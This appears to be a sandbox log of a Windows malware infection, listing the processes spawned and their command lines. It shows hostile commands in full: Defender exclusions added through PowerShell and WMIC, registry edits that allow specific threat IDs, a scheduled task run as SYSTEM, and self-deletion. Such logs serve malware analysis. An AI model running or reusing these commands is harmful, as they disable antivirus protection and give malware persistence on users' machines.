C:\Users\Admin\Pictures\96RYGPnDVuI0ig9OUcladUHF.exe

"C:\Users\Admin\Pictures\96RYGPnDVuI0ig9OUcladUHF.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'

C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe

"C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe"

C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe

"C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe" --silent --allusers=0

C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe

C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x6b28e1d0,0x6b28e1dc,0x6b28e1e8

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\lMASrt8bdzeJuUab8VNu9cph.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\lMASrt8bdzeJuUab8VNu9cph.exe" --version

C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe

"C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe"

C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe

"C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5704 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240429123651" --session-guid=69bbc1c5-6ffb-461a-aa7f-ef59611f723c --server-tracking-blob="MDg0NDZlNGMzNzQzMDIyMGU0NGZlNDAzYTM4MmNhNjlmMzY4OTE1ZmNhYTRhZjFjM2M2Y2ExYzgxMzdmOTg2ZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0Mzk0MjAyLjE4NzAiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiNDhiNjY5NGQtOGVjYy00Y2Y2LWFlOWUtYmU3ZmRmYjY0ZjcxIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6004000000000000

C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe

C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2ac,0x2b0,0x2b4,0x27c,0x2b8,0x6a90e1d0,0x6a90e1dc,0x6a90e1e8

C:\Users\Admin\Pictures\nNWwreBQ6hpuLdr61311PVMb.exe

"C:\Users\Admin\Pictures\nNWwreBQ6hpuLdr61311PVMb.exe"

C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe

.\Install.exe /WkfdidVYT "385118" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 12:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe\" Wt /mYldiddIzO 385118 /S" /V1 /F

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn biPxHmULFllsbMgnpt

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn biPxHmULFllsbMgnpt

C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe Wt /mYldiddIzO 385118 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x5b6038,0x5b6044,0x5b6050

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

